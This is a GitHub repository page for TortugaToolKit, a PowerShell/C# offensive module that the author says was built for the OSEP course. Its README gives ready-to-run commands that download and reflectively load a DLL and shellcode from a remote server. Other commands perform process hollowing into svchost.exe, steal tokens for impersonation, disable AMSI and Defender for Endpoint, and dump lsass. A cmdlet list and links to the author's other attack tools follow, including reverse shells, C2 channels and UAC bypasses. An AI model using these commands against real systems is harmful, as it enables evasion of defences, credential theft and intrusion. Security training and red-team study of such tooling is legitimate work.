• Stars
    star
    140
  • Rank 260,371 (Top 6 %)
  • Language
    C#
  • License
    The Unlicense
  • Created over 3 years ago
  • Updated about 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Collection of some of my own tools with other great open source tools out there packaged into a powershell module

TortugaToolKit

Written during OSEP course, for learning purposes. Used heavily during the exam with much success. Thanks to all the open source projects out there that i was able to use and learn from.

Examples

Load it

$a=[System.Reflection.Assembly]::Load($(IWR -Uri http://yourserver/tortugatoolkit.dll -UseBasicParsing).Content);
Import-Module -Assembly $a

Example of remotely loading and encrypting shellcode, then performing proc hollow with it

$code = Invoke-EncryptShellcode -shellcode $(IWR -Uri 'http://ip/shellcode.bin' -usebasicparsing).Content
INVPH -encsh $code.encryptedShellcode -k $code.encryptionKey -ivk $code.initVectorKey -pn 'svchost.exe' -Verbose

Example of performing ping sweep then admin check on subnet

$s = Invoke-PingSweep -s "172.16.23.0";
foreach($h in $s){Invoke-AdminCheck -t $h}

Invoke-AdminCheck -h $(Invoke-PingSweep -s "172.16.75.0")

Example of impersonation via process token then running SharpView (or sharphound) as that domain user

Show-AvailableTokens | Format-Table
Invoke-ImpersonateToken -processId 7100

Get-CurrentIdentity

Invoke-TurtleView -c "Get-DomainComputers";
Invoke-TurtleHound

Example of impersonating via process token then performing process hollow as the user.

$code = Invoke-EncryptShellcode -shellcode $(IWR -Uri 'http://ip/shellcode.bin' -usebasicparsing).Content
Invoke-ImpersonateProcessHollow -processId 1092 -exe "svchost.exe" -decryptKey $code.encryptionKey -shellCode $code.encryptedShellcode -initVector $code.initVectorKey

Example of disabling amsi then disabling defender for endpoint and performing lsass process dump

Disable-AyEmEsEye -Verbose
Disable-DefenderForEndpoint
Invoke-TurtleDump
Enable-DefenderForEndpint

Example of loading and executing a c# assembly

Invoke-AssemblyLoader -e $false -l $false -path "http://ip/payload" -name namespace -clss targetclass -run method

Cmdlets

Disable-AyEmEsEye
Disable-DefenderForEndpoint
Disable-Etw
Enable-DefenderForEndpoint
Enable-Privileges
Get-ActiveDirectoryComputers
Get-ActiveDirectoryForests
Get-ActiveDirectoryGroupMembership
Get-ActiveDirectoryGroups
Get-ActiveDirectoryUsers
Get-CurrentIdentity
Get-MsSQLQuery
Get-SQLInfo
Get-System
Get-TrustedInstaller
Invoke-UnhookDll
Invoke-AdminCheck
Invoke-AssemblyLoader
Invoke-ClassicInjection
Invoke-FileLessLateralMovement
Invoke-LsaSecretsDmp
Invoke-MsSQLAssembly
Invoke-MsSQLShell
Invoke-PingSweep
Invoke-ProcessHollow
Invoke-ShellcodeEncryption
Invoke-TokenStealer
Invoke-TurtleDump
Invoke-TurtleHound
Invoke-TurtleUp
Invoke-TurtleView
Invoke-ImpersonateProcessHollow
Invoke-ImpersonateToken
Show-AvailableTokens
Undo-Impersonation

Credits

Unlicense

This is free and unencumbered software released into the public domain.


Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.


In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.


THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.

For more information, please refer to http://unlicense.org/

More Repositories

1

SharpChisel-NG

33
star
2

GOCoffLoader

Its a coff loader ported to go
Go
18
star
3

DisablePPLDriverPoc

Disable PPL via custom driver and dump lsass
C
13
star
4

GoPELoader

Go
11
star
5

YoutubeAsAC2

Poc of using youtube comments for C2 communications
Go
7
star
6

latortugaDump

Learning how to implement lsass dump using existing research
C++
7
star
7

SharpFirewall

Add and delete firewall rules with c#
C#
7
star
8

GoPsExec

Basic Psexec clone, but in golang.
Go
6
star
9

GoSecretsDump

Basic Clone Of Impacket Secrets Dump
Go
6
star
10

AWAE-Prep-Exploits-Notes

Prep for AWAE collections of exploits & notes
Shell
6
star
11

osed-automation

automation for osed course
Python
5
star
12

GoWinRm

Go Port for C++ WinRm Library
Go
5
star
13

GoSmbExec

Basic SMBExec clone, but in golang.
Go
4
star
14

Medias

Socks5 Go Implementation For Use In C2
Go
4
star
15

Sektor7PersistenceCourseSolution

Solution For Final Assignment of Sektor7 PersistenceCourse
C
4
star
16

GolangReverseShell

Classic Reverse Shell In Golang For Linux And Windows
Go
3
star
17

SharpComHijack

C#
3
star
18

pview

Monitor New Processes Created On MacOS
Python
3
star
19

OSEP-ProccessHollowCpp

Porting c# process hollow exercise from OSEP to cpp
C++
2
star
20

MeowthCore

Merging TurtleToolKit and Meowth
C#
2
star
21

memfd_secretPOC

memfd_secret fun
Python
2
star
22

CToShellcodeAutomation

Automating @hasherezade method of writing shellcode in C. For use in azure devops
Assembly
2
star
23

AWS_Ephemeral_Workspaces

One of many solutions for creating ephemeral workspaces in AWS
Python
2
star
24

UACBypassProcHollowSelfDeleteCpp

Quick PoC Chaining some techniques together
C++
2
star
25

shellg

generates c reverse shell for any platform quickly
Go
2
star
26

CVE-2018-6892-Golang

Ported Exploit From Python To Golang
Go
1
star
27

CoffeePot

C RISC-V Emulator For Snapshot Fuzzing
C++
1
star
28

leetcodes

notes and solutions
Python
1
star
29

GSuiteAlerts2Splunk

Pull Alerts and send to splunk HEC
Python
1
star
30

inject_memory.h

Library to inject shellcode and elf files
C
1
star
31

UrlScannerChromeExtension

Chrome extensions that uses urlscan.io to scan urls
JavaScript
1
star
32

LAAMB

LAAMB (LogicAppAbuserMakesBackdoors)
PowerShell
1
star
33

Plumbr

Sniff Named Pipes
PowerShell
1
star
34

SimpleHookH

C
1
star